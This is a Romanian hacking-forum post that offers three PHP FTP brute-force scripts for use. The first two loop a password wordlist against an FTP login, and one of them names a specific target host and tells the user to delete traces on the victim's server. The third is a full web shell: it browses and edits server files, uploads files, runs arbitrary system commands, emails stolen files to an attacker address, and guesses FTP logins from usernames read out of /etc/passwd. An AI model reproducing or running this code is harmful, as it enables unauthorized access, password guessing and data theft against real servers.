Jump to content
sawyer

FTP Brute Force ( 3 php scripts )

By sawyer, in Programare

Recommended Posts

sawyer Newbie

sawyer

Posted
Posted

In aceasta sectiune, voi posta 3 coduri de scripturi pe care le puteti folosi pentru brute force

Script 1: ( incepatori )

<?php
error_reporting(0);
$host = $_POST["host"];
$user = $_POST["user"];
$dict = $_POST["dict"];
if (!isset($_POST['submit'])) 
{
echo "<form method=\"post\" action=\"ftpbrute.php\">"; 
echo "Host: <input type=\"text\" name=\"host\">
"; 
echo "User: <input type=\"text\" name=\"user\">
";
echo "Wordlist: <input type=\"text\" name=\"dict\">
";
echo "<input type=\"submit\" value=\"Start\" name=\"submit\">";
echo "</form>";
}else{
$file = fopen ($dict, "r");
while (!feof ($file)) {
$pass[$i] = fgets($file, 1024);
$i++;
} fclose($file);
$limit = count($pass);
$width2 = $limit;
echo "[o] Loaded ".$limit." passwords. 
";
echo "[o] Progress: 
";
echo "<IMG SRC=\"end.jpg\" WIDTH=\"".$width2."\" HEIGHT=\"10\" \">
";
for ($i=0; $i<$limit; $i++){
$ftp = ftp_connect($host, 21);
if(ftp_login($ftp, $user, $pass[$i])){
echo "
[o] Success!
[o] Username: ".$user."
[o] Password:".$pass[$i]."
";
}else{
$width = 1;
echo "<IMG SRC=\"progress.jpg\" WIDTH=\"".$width."\" HEIGHT=\"10\" \">";
}}
ftp_close($ftp);
echo "
Done.";
}
?>

Script 2: ( avansati )

<?php

error_reporting(E_PARSE); //we want any exception except from WARNING MESSAGES
set_time_limit(0); // set the time limit for the script to +oo

$passwordfile = "passwd.dic";   //this is the path to the passwordfile
$targethost = "www.bahoosh.net"; //change this to the host you want to attack
$usrname = "bahoosh"; // change this to the username
                                              // of the FTP account you want
                                              // to attack
$interval = 1; // this is the break the script each time it tries a password
               // do not set this to zero

//change the second arguments you desire
$crh = "Sorry, the host you specified cannot be retrieved!";
$cc = "<font color=\"red\">Sorry, I cannot connect to $targethost with [b]$username[/b] and password: $trypassword</font>
";


/* DO NOT CHAGE ANYTHING BELOW THIS LINE UNLESS YOU REALLY KNOW WHAT YOU ARE DOING */

if(!file_exists($passwordfile)) {
	die("Sorry, the passwordfile [b]$passwordfile[/b] cannot be retrieved");
} else {
	// open connection funtion
        function openconnection($targethost,$username,$trypassword) {
			print "<hr>Trying password [b]$trypassword[/b] for [b]".$username."[/b] to $targethost<hr>
";
			$ftp_conn = @ftp_connect($targethost) or print $crh;
			if($ftp_conn) {
				$trylogin = @ftp_login($ftp_conn,$username,$trypassword);
					if(!$trylogin) {
						print $cc;
					} else {
						print "[b]<font color=\"red\">The password is: $trypassword</font>[/b]
";
						@ftp_quit($ftp_conn);
						break;
					}
			}
		}
        //end of function

        // try to open the password file
	$fp = @fopen($passwordfile,"r");
	if(!$fp) {
		die("The password file cannot open");
	} else {
		print "[b]The passwordfile is forked![/b]";
		//get the passwords
		while($trypassword = @fgets($fp,1024)) {
			openconnection($targethost,$usrname,$trypassword);
			sleep($interval);
		}
	}
	//...and close the password file or die of errors
	@fclose($fp) or die("\n
\nCannot close the password file!\n");
	echo "[b]The password file has closed";

}

// when you succeed connecting to your victim's server
// do not forget to delete your traces
?>

Script 3: ( experti )

<?


/* Your eMail for file sending, type your own*/
$demail ="Type your eMail here";

/* config processing */
$title="FTP Brute Force Edited By:Khodavand_Bozorg (NetGaurd Security Corp)";
$ver="1.1";


/* FTP-Brute */
$filename="/etc/passwd";
$ftp_server="localhost";

/* Options done, now designing */
$meta = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">";
$style=<<<style
<style>
a.menu   {
color: #ffffcc;
text-decoration:none;
font-family: Times New Roman;
font-weight: bold;
     }
a.menu:hover   {
color: #FF0000;
font-family: Times New Roman;
text-decoration: none
font-weight: bold;
          }
a   {
color: #000000;
text-decoration:none;
font-family: Tahoma;
font-size: 11px;
     }
a:hover   {
color: #184984;
font-family: Tahoma;
text-decoration: underline
font-size: 11px;
          }
td.up{
color: #996600;
font-family: Verdana;
font-weight: normal;
font-size: 11px;
}
.pagetitle {
font-family: Arial, Helvetica, sans-serif; 
color: #FFFFFF; 
text-decoration: none; 
font-size: 12px
}
.alert   {
color: #FF0000;
font-family: Tahoma;
font-size: 11px;
          }
.button1 {
font-size:11px;
font-weight:bold;
font-family:Verdana;
background:#184984;
border:1px solid #000000; cursor:hand; color:#ffffcc;
}
.inputbox {font-size:11px; font-family:Verdana, Arial, Helvetica, sans-serif; background:#EBEFF6; color:#213B72; border:1px solid #000000; font-weight:normal}
.submit_button {  font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #FFFFFF; background-color: #999999;}
.textbox { background: White; border: 1px #000000 solid; color: #000099; font-family: "Courier New", Courier, mono; font-size: 11px; scrollbar-face-color: #CCCCCC; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #FFFFFF; scrollbar-darkshadow-color: #FFFFFF; scrollbar-track-color: #FFFFFF; scrollbar-arrow-color: #000000 ; border-color: #000000 solid}
b {  font-weight: bold}
table {  font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #184984}
</style>
style;

/* Table styles */
$style1=<<<table
STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
table;
$style2=<<<table_file
STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
table_file;
$style3=<<<table_dir
STYLE="background:#28BECA" onmouseover="this.style.backgroundColor = '#FFFFCC'" onmouseout="this.style.backgroundColor = '#28BECA'"
table_dir;
$style4=<<<table_files
STYLE="background:#DCDCB0" onmouseover="this.style.backgroundColor = '#28BECA'" onmouseout="this.style.backgroundColor = '#DCDCB0'"
table_files;
$style_button=<<<button
STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
button;
$style_open=<<<open
STYLE="background:#006200" onmouseover="this.style.backgroundColor = '#006200'" onmouseout="this.style.backgroundColor = '#006200'"
open;
$style_close=<<<close
STYLE="background:#FF0000" onmouseover="this.style.backgroundColor = '#FF0000'" onmouseout="this.style.backgroundColor = '#FF0000'"
close;

/* Post form */
$form = "

     <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
   <tr>
  <td align=center class=pagetitle colspan=2>[b]Script help for NetGaurd FTP Brute Force[/b]</font>[/b]</td>
  <td colspan=2 align=center class=pagetitle>[b]Contact With Javid:[/b]</td>
  </tr>
    <tr>
      <td width='250' class=pagetitle>[b]Name:[/b]</td>
      <td width='250' class=pagetitle>
        <input type='text' name='name' size='40' class='inputbox'></td>
      </tr>
    <tr>
      <td width='250' class=pagetitle>[b]Email:[/b]</td>
      <td width='250'><input type='text' name='email' size='40' class='inputbox'></td>
    </tr>

  <tr>
      <td width=500 colspan=2><textarea rows='4' name='pole' cols='84' class='inputbox' ></textarea></td></tr>
  <tr>
  <td align=right><input type='submit' value='Submit' name='B1' class=button1 $style_button></td>
      <td align=left><input type='reset' value='Reset' name='B2' class=button1 $style_button></td>
      </tr>
</form></table>

";



/* HTML form */
$HTML=<<<html
<html>
<head>
<title>$title $ver</title>
$meta
$style
</head>
<body bgcolor=#006699 leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
<tr><td align=center colspan=9 class=pagetitle>[b]NetGaurd FTP Brute Force [/b]ver.<font color=red>$ver</font></td></tr>
<tr><td align=center colspan=9 class=pagetitle>Hacking Script...</td></tr>
<tr>
<td $style2 align=center width='25%' >[url="http://www.Exilland.persianblog.com"].:Javid Blog [/url]</td>
<td $style2 align=center width='15%'>[url='$PHP_SELF?action=help'].:About US[/url]</td>
<td $style2 align=center width='15%'>[url='$PHP_SELF?action=ftp'].:FTP[/url]</td>
<td $style2 align=center width='15%'>[url='$PHP_SELF'].:Home[/url]</td>

</tr>
</table>
html;


/* Don't change anything here or the script will be not work*/
global $action,$tm,$cm;

function getdir() {
 global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF;
 $st = getcwd();
 $st = str_replace("\\","/",$st);
 $j = 0;
 $gdir = array();
 $gsub = array();
 print("
");
 for ($i=0;$i<=(strlen($st)-1);$i++) {
  if ($st[$i] != "/") {
   $gdir[$j] = $gdir[$j].$st[$i];
   $gsub[$j] = $gsub[$j].$st[$i];
  } else {
   $gdir[$j] = $gdir[$j]."/";
   $gsub[$j] = $gsub[$j]."/";
   $gdir[$j+1] = $gdir[$j];
   $j++;
  }
 }
 print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left>[b]Current Directory: [/b]");
 for ($i = 0;$i<=$j;$i++) print("[url='$PHP_SELF?tm=$gdir[$i]']$gsub[$i][/url]");
 $free = tinhbyte(diskfreespace("./"));
 print("</td></tr><tr><td align=left>[b]Avaible Space on Server[/b] : <font face='Tahoma' size='1' color='#000000'>$free</font></td></tr>");
 print("<tr><td align=left>[b] ".exec("uname -a")."[/b]</td></tr>");
 print("<tr><td align=left>[b]Your IP:[/b]<font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR</font></td></tr></table>
");
}

function tinhbyte($filesize) {
 if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
 elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
 elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
 else { $filesize = $filesize . ""; }
 return $filesize;
}

function permissions($mode) {
 $perms  = ($mode & 00400) ? "r" : "-";
 $perms .= ($mode & 00200) ? "w" : "-";
 $perms .= ($mode & 00100) ? "x" : "-";
 $perms .= ($mode & 00040) ? "r" : "-";
 $perms .= ($mode & 00020) ? "w" : "-";
 $perms .= ($mode & 00010) ? "x" : "-";
 $perms .= ($mode & 00004) ? "r" : "-";
 $perms .= ($mode & 00002) ? "w" : "-";
 $perms .= ($mode & 00001) ? "x" : "-";
 return $perms;
}

function readdirdata($dir) {
 global $action,$files,$dirs,$tm,$supsub,$thum,$style3,$style4,$PHP_SELF;
 $files = array();
 $dirs= array();
 $open = @opendir($dir);

 if (!@readdir($open) or !$open ) echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert>[b]No Access.[/b]</td></tr></table>";
 else {
  $open = opendir($dir);
  while ($file = readdir($open)) {
   $rec = $file;
   $file = $dir."/".$file;
   if (is_file($file)) $files[] = $rec;
  }
  sort($files);
  $open = opendir($dir);
  $i=0;
  while ($dire = readdir($open)) {
   if ( $dire != "." ) {
    $rec = $dire;
    $dire = $dir."/".$dire;
    if (is_dir($dire)) {
     $dirs[] = $rec;
     $i++;
    }
   }
  }
  sort($dirs);
  print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'center' class=pagetitle>[b]Name[/b]</td><td width = '10%' align = 'center' class=pagetitle>[b]Size[/b]</td><td width = '20%' align = 'center' class=pagetitle>[b]Creation Date[/b]</td><td width = '10%' align = 'center' class=pagetitle>[b]Typ[/b]</td><td width = '15%' align = 'center' class=pagetitle>[b]Access Rules[/b]</td><td width = '25%' align = 'center' class=pagetitle>[b]Comments[/b]</td></tr></table>");
  for ($i=0;$i<sizeof($dirs);$i++) {
   if ($dirs[$i] != "..") {
    $type = 'Dir';
    $fullpath = $dir."/".$dirs[$i];
    $time = date("d/m/y H:i",filemtime($fullpath));
    $perm = permissions(fileperms($fullpath));
    $size = tinhbyte(filesize($fullpath));
    $name = $dirs[$i];
    $fullpath = $tm."/".$dirs[$i];
    if ($perm[7] == "w" && $name != "..") $action = "
	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
	<tr>
	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=uploadd'>Upload</a></td>
	<td align=center $style3><a href ='$PHP_SELF?tm=$tm&dd=$name&action=deldir'>Remove</a></td>
	</tr>
	<tr>
	<td align=center $style3 colspan=2><a href ='$PHP_SELF?tm=$fullpath&action=newdir'>New Directory</a></td>
	</tr></table>";
    else $action = "<TABLE CELLPADDING=0 CELLSPACING=0 width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center>[b]Read Only[/b]</td><td align=center $style2><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Archiv</a></td></tr></table>";
    print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#33CCCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><a href = '$PHP_SELF?tm=$fullpath'>[b][i]$name[/i][/b]</a></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'left'>$action</td></tr></table>");
   }
  }
  for ($i=0;$i<sizeof($files);$i++) {
   $type = 'File';
   $fullpath =  $dir."/".$files[$i];
   $time = date("d/m/y H:i",filemtime($fullpath));
   $perm = permissions(fileperms($fullpath));
   $size = tinhbyte(filesize($fullpath));
   if ( $perm[6] == "r" ) $act = "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center $style4>[url='$PHP_SELF?tm=$dir&fi=$files[$i]&action=view']View[/url]</td><td align=center $style4>[url='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download']Download[/url]</td>
   <td align=center $style4>[url='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download_mail']Download Mail[/url]</td></tr></table>";
   if ( $perm[7] == "w" ) $act .= "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center $style4>[url='$PHP_SELF?tm=$dir&fi=$files[$i]&action=edit']Edit[/url]</td><td align=center $style4>[url='$PHP_SELF?tm=$dir&fi=$files[$i]&action=delete']Delete[/url]</td></tr></table>";
   print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'>[b]$files[$i][/b]</font></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'center'>$act</td></tr></table>");
  }
 }
}

function html() {
global $ver,$meta,$style;
echo "
<html>
<head>
<title>NetGaurd FTP Brute Force</title>
</head>
<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
";
}

# View File
function viewfile($dir,$file) {

 $buf = explode(".", $file);
 $ext = $buf[sizeof($buf)-1];
 $ext = strtolower($ext);
 $dir = str_replace("\\","/",$dir);
 $fullpath = $dir."/".$file;

 switch ($ext) {
  case "jpg":

	header("Content-type: image/jpeg");
    readfile($fullpath);
    break;
    case "jpeg":

    header("Content-type: image/jpeg");
    readfile($fullpath);
    break;
    case "gif":

    header("Content-type: image/gif");
    readfile($fullpath);
    break;

	 case "png":

    header("Content-type: image/png");
    readfile($fullpath);
    break;
    default:

	 case "avi":	
    header("Content-type: video/avi");
    readfile($fullpath);

    break;
    default:

	 case "mpeg":	
    header("Content-type: video/mpeg");
    readfile($fullpath);
    break;
    default:

	 case "mpg":	
    header("Content-type: video/mpg");
    readfile($fullpath);
    break;
    default:

    html();
	chdir($dir);
    getdir();

   echo "
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><font color='#FFFFCC' face='Tahoma' size = 2>Way to File:</font><font color=white  face ='Tahoma' size = 2>$fullpath</font></td></tr></table>";
   $fp = fopen($fullpath , "r");
   while (!feof($fp)) {
    $char = fgetc($fp);
    $st .= $char;
   }

   $st = str_replace("&", "&", $st);
   $st = str_replace("<", "<", $st);
   $st = str_replace(">", ">", $st);

   $tem = "<p align='center'><textarea wrap='off' rows='20' name='S1' cols='90' class=inputbox>$st</textarea></p>";
   echo $tem;
   fclose($fp);
   break;
 }
}

# Send File to Mail
function download_mail($dir,$file) {
 global $action,$tm,$cm,$demail, $REMOTE_ADDR, $HTTP_HOST, $PATH_TRANSLATED;
 $buf = explode(".", $file);
 $dir = str_replace("\\","/",$dir);
 $fullpath = $dir."/".$file;
 $size = tinhbyte(filesize($fullpath));
 $fp = fopen($fullpath, "rb");
 while(!feof($fp))

  $attachment .= fread($fp, 4096);
  $attachment = base64_encode($attachment);
  $subject = "NetGaurd FTP Brute Force  ($file)";

  $boundary = uniqid("NextPart_");
  $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";

  $info = "---==== Mail from ($demail)====---\n\n";
  $info .= "IP:\t$REMOTE_ADDR\n";
  $info .= "HOST:\t$HTTP_HOST\n";
  $info .= "URL:\t$HTTP_REFERER\n";
  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";

  $send_to = "$demail";             

  $send = mail($send_to, $subject, $info, $headers);

  if($send == 2)  
   echo "

	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
	<tr><td align=center>
	<font color='#FFFFCC' face='Tahoma' size = 2>Thanks!!!File [b]$file[/b] Was sending you to <u>$demail</u>.</font></center></td></tr></table>
";

fclose($fp);
 }



# Edit File
function editfile($dir,$file) {
 global $action,$datar;
 $fullpath = $dir."/".$file;
 chdir($dir);
 getdir();
 echo "
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>$fullpath</font></center></td></tr></table>";
 $fp = fopen($fullpath , "r");
 while (!feof($fp)) {
  $char = fgetc($fp);
  $st .= $char;
 }
 $st = str_replace("&", "&", $st);
 $st = str_replace("<", "<", $st);
 $st = str_replace(">", ">", $st);
 $st = str_replace('"', """, $st);
 echo "<form method='POST' action='$PHP_SELF?tm=$dir&fi=$file&action=save'><p align='center'><textarea rows='14' name='S1' cols='82' class=inputbox>$st</textarea></p><p align='center'><input type='submit' value='Submit' name='save' class=button1 $style_button></p><input type = hidden value = $tm></form>";
 $datar = $S1;

}

# Save File
function savefile($dir,$file) {
 global $action,$S1,$tm;
 $fullpath = $dir."/".$file;
 $fp = fopen($fullpath, "w");
 $S1 = stripslashes($S1);
 fwrite($fp,$S1);
 fclose($fp);
 chdir($dir);
 echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File [b]$fullpath[/b] Edited.</font></td></tr></table>";
 getdir();
 readdirdata($tm);
}

# Delete Directory
function deletef($dir)
{
 global $action,$tm,$fi;
 $tm = str_replace("\\\\","/",$tm);
 $link = $tm."/".$fi;
 unlink($link);
 chdir($tm);
 getdir();
 readdirdata($tm);
}

# Upload File
function uploadtem() {
 global $file,$tm,$thum,$PHP_SELF,$dir,$style_button;
 echo "
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form enctype='multipart/form-data' action='$PHP_SELF?tm=$dir&action=upload' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>[b]Upload File:[/b]</td></tr><tr><td><input type='hidden' name='tm' value='$tm'></td><td><input name='userfile' type='file' size=48 class=inputbox></td><td><input type='submit' value='Upload File' class=button1 $style_button></td></tr></form></table>";
}

function upload() {
 global $HTTP_POST_FILES,$tm;
 echo $set;
 copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile"][name]) or die("CanT Upload File".$HTTP_POST_FILES["userfile"][name]);
 echo "
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File [b]".$HTTP_POST_FILES["userfile"][name]."[/b] sucessfull uploaded.</font></center></td></tr></table>";
 @unlink($userfile);
 chdir($tm);
 getdir();
 readdirdata($tm);
}


# Create New Directory
function newdir($dir) {
 global $tm,$nd;
 print("
<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'post' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle>[b]Create Directory:[/b]</td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='Create' class=button1 $style_button></td></tr></form></table>");
}

function cdir($dir) {
 global $newd,$tm;
 $fullpath = $dir."/".$newd;
 if (file_exists($fullpath)) @rmdir($fullpath);
 if (@mkdir($fullpath,0777)) {
  echo "
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory created.</font></center></td></tr></table>";
 } else {
  echo "
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Failed To Create Directory.</font></center></td></tr></table>";
 }
 chdir($tm);
 getdir();
 readdirdata($tm);
}

# Delete Directory 
function deldir() {
 global $dd,$tm;
 $fullpath = $tm."/".$dd;
 echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory Deleted.</font></center></td></tr></table>";
 rmdir($fullpath);
 chdir($tm);
 getdir();
 readdirdata($tm);
}

# Mail System
function mailsystem() {
 global $status,$form,$action,$name,$email,$pole,$REMOTE_ADDR,$HTTP_REFERER,$DOCUMENT_ROOT,$PATH_TRANSLATED,$HTTP_HOST;
 if (!isset($status)) echo "$form";
 else {
  $email_to ="Javid.Momeni@Gmail.com";
  $subject = "NetGaurd FTP Brute Force ($name)";
  $headers = "From: $email";

  $info = "---==== Mail from ($name)====---\n\n";
  $info .= "Name:\t$name\n";
  $info .= "Email:\t$email\n";
  $info .= "What?:\n\t$pole\n\n";
  $info .= "IP:\t$REMOTE_ADDR\n";
  $info .= "HOST:\t$HTTP_HOST\n";
  $info .= "URL:\t$HTTP_REFERER\n";
  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
  $send_to = "$email_to";             

  $send = mail($send_to, $subject, $info, $headers);
  if($send == 2) echo "
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Thanks!!!Your mail was send.</font></center></td></tr></table>
";
 }
}

# Help
function help() {
 global $action,$REMOTE_ADDR,$HTTP_REFERER;
 echo "

<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
<tr><td align=center class=pagetitle>[b]About NetGaurd FTP Brute Force Script[/b]</font>[/b]</td></tr>
<tr><td bgcolor=#FFFFCC>
[b]NetGaurd FTP Brute Force[/b] - Script For All NetGaurd Full Access Members Team</font>


To This Script Was Added This Menu for Version 1.1 :

- FTP bruteforce (Behrooz_Ice)

[b]NetGaurd FTP Brute Force - Script For All NetGaurd Full Access Members Team. Dont Give to Other People.[/b]


[b]Find Us:[/b]

Site Adress: [url]www.Exilland.Persianblog.com[/url]

See Ya!!!
</td></tr></table>
";
}

# FTP-Brute
function ftp() {
 global $action, $ftp_server, $filename, $HTTP_HOST;
 echo "
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle>FTP-server: [b]$ftp_server[/b]</td></tr>";

 $fpip = @fopen ($filename, "r");
 if ($fpip) {
  while (!feof ($fpip)) { 
   $buf = fgets($fpip, 100);
   ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
   $conn_id=ftp_connect($ftp_server);
   if (($conn_id) && (@ftp_login($conn_id, $g[1], $g[1]))) {

   $f=@fopen($HTTP_HOST,"a+");
   fputs($f,"$g[1]:$g[1]\n");
     echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle>[b]Connected with login:password - ".$g[1].":".$g[1]."[/b]</td></tr></table>";

   ftp_close($conn_id);
   fclose($f);
   } else {
    echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center>".$g[1].":".$g[1]." - [b]failed[/b]</td></tr></table>";
   }
  }
 }
}


function ashiyane_copyright() {
global $action,$upass,$uname,$nfm;
 return "
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#000000' face='Tahoma' size = 2>[b]Powered by NetGaurd Security Corp (author Khodavand_Bozorg) Special Thanks to Lucifer & Q7x < Made In IRan >[/b]</font></center></td></tr></table></body></html>";


 }

/* main() */
set_time_limit(0);

if ( $action !="download") print("$HTML");

if (!isset($cm)) {
 if (!isset($action)) {
  if (!isset($tm)) { $tm = getcwd(); }
  $curdir = getcwd();
  if (!@chdir($tm)) exit("
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert>No Access To The Directory, Look CHMOD.</td></tr></table>");
  getdir();
  chdir($curdir);
  $supsub = $gdir[$j-1];
  if (!isset($tm) ) { $tm=getcwd();}
  readdirdata($tm);
 } else {
  switch ($action) {
   case "view":
    viewfile($tm,$fi);
    break;
   case "delete":
    echo "
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File [b]$fi[/b] Sucessfull Deleted.</font></center></td></tr></table>";
    deletef($tm);
    break;
   case "download":
   if (isset($fatt) && strlen($fatt)>0) {
    $attach=$fatt; 
    header("Content-type: text/plain"); 
   } 
   else {
    $attach=$fi;
    header("Content-type: Haji"); 
   }
   header("Content-disposition: attachment; filename=\"$attach\";"); 
   readfile($tm."/".$fi);
   break;
   case "download_mail":
   download_mail($tm,$fi);
   break;
   case "edit":
   editfile($tm,$fi);
   break;
  case "save":
   savefile($tm,$fi);
   break;
  case "uploadd":
   uploadtem();
   break;
  case "up":
   up($tm);
   break;
  case "newdir":
   newdir($tm);
   break;
  case "createdir":
   cdir($tm);
   break;
  case "deldir":
   deldir();
   break;
  case "upload":
   upload();
   break;
  case "help":
   help();
   break;
  case "ftp":
   ftp();
   break;
   case "passwd":
   passwd();
   break; 
  }
 }
} else {
 echo "
<table CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFFF BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center>Finished: $cm</center><pre>";
 echo system($cm);
 echo "</pre></td></tr></table>";
}

if ( $action !="download") echo ashiyane_copyright();
?>

succes! sper sa va ajute la ceva :P

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...